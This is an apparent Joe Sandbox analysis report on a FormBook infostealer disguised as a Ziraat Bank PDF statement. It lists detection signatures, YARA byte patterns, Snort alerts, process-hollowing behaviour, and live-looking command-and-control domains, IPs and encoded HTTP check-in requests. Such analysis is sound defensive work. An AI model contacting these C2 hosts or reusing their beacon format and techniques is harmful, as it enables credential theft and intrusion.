Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:811416
MD5:ce02e10bf8de65619ae4296d38288219
SHA1:e8a6f91c9978e5604c9edc90b33001da3278b618
SHA256:24df0ccdc95c15d68f1bdee2d09ec3cd9fafbe9913cadacee75889d407cd8f84
Tags:comexeFormbookgeoTURZiraatBank
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 3176 cmdline: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe MD5: CE02E10BF8DE65619AE4296D38288219)
    • cmezd.exe (PID: 1360 cmdline: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p MD5: A970E84ACDE64C70D2FFD66BACBAC590)
      • cmezd.exe (PID: 4876 cmdline: C:\Users\user\AppData\Local\Temp\cmezd.exe MD5: A970E84ACDE64C70D2FFD66BACBAC590)
        • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • rundll32.exe (PID: 3104 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.cmezd.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.cmezd.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.cmezd.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19eb8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x19954:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x19fba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1a132:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xc7cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x18b9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1fc2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x20bdd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.cmezd.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.cmezd.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3198.54.117.21649709802031453 02/18/23-13:07:11.131993
          SID:2031453
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3208.100.26.24549718802031453 02/18/23-13:07:43.249524
          SID:2031453
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3198.54.117.21649709802031412 02/18/23-13:07:11.131993
          SID:2031412
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3208.100.26.24549718802031412 02/18/23-13:07:43.249524
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.38.8.8.862704532023883 02/18/23-13:05:18.631141
          SID:2023883
          Source Port:62704
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic
          Timestamp:192.168.2.3198.54.117.21649709802031449 02/18/23-13:07:11.131993
          SID:2031449
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.391.195.240.11749715802031449 02/18/23-13:07:32.618267
          SID:2031449
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.391.195.240.11749715802031453 02/18/23-13:07:32.618267
          SID:2031453
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3208.100.26.24549718802031449 02/18/23-13:07:43.249524
          SID:2031449
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.391.195.240.11749715802031412 02/18/23-13:07:32.618267
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 43%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lCAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg==Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg==Avira URL Cloud: Label: malware
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.wenzid4.top/ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==Avira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRczAvira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g==Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRczAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeReversingLabs: Detection: 12%
          Machine Learning detection for sample
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 2.2.cmezd.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.cmezd.exe.c80000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: cmezd.exe, 00000001.00000003.257768697.0000000001190000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000001.00000003.261136975.000000001A540000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.000000000192F000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.0000000001810000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000003.263612965.000000000167A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.304145005.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.00000000049AF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.302045317.000000000455F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.0000000004890000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: cmezd.exe, 00000001.00000003.257768697.0000000001190000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000001.00000003.261136975.000000001A540000.00000004.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.000000000192F000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000002.302717364.0000000001810000.00000040.00001000.00020000.00000000.sdmp, cmezd.exe, 00000002.00000003.263612965.000000000167A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.304145005.00000000046F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.00000000049AF000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000009.00000003.302045317.000000000455F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.780033322.0000000004890000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: cmezd.exe, 00000002.00000002.302640437.000000000157A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: cmezd.exe, 00000002.00000002.302640437.000000000157A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136DB70 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_0136DB70
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136DABC FindFirstFileExW,1_2_0136DABC
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136D74D FindFirstFileExW,1_2_0136D74D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136D7FE FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_0136D7FE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01351022 FindFirstFileW,FindClose,2_2_01351022
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136D74D FindFirstFileExW,2_2_0136D74D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136D7FE FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0136D7FE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136DB70 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0136DB70
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136DABC FindFirstFileExW,2_2_0136DABC

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bemmulher.online
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.assilajamiart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.ixirwholesale.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.100.26.245 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hubyazilim.com
          Source: C:\Windows\explorer.exeDomain query: www.sem-jobs.com
          Source: C:\Windows\explorer.exeDomain query: www.7dkjhk.com
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeDomain query: www.yeah-go.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 85.13.156.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 141.95.126.89 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:62704 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 198.54.117.216:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49715 -> 91.195.240.117:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49715 -> 91.195.240.117:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49715 -> 91.195.240.117:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 208.100.26.245:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 208.100.26.245:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49718 -> 208.100.26.245:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDNS query: www.ixirwholesale.xyz
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: Joe Sandbox ViewASN Name: VODAFONE_ROCharlesdeGaullenr15RO VODAFONE_ROCharlesdeGaullenr15RO
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ== HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg== HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRcz HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg== HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEKoXZLS1zEAfoQ==&9WI6t=QaRcz HTTP/1.1Host: www.ladybillplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g== HTTP/1.1Host: www.hubyazilim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcz HTTP/1.1Host: www.7dkjhk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ== HTTP/1.1Host: www.assilajamiart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=s7qY3xXjkC1/TbWEYc6+5vkm1XLSScFCKWQ5egwgnE5ocsyGKPoCuhR72/pzoQfhJiIIuERBZ9Gt0DxnImXC1vT81iEZuqsQmQ== HTTP/1.1Host: www.sem-jobs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Y5=bNlPHlhETrwE0CBUTa4Ov0f9IitGRas8007S+k/uRSIn2M4XJq0O4GAgtFn3DdbLFzy6ewAkUq9t07yJukgh3h16R0bz/1ZGgA==&9WI6t=QaRcz HTTP/1.1Host: www.yeah-go.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ== HTTP/1.1Host: www.ixirwholesale.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
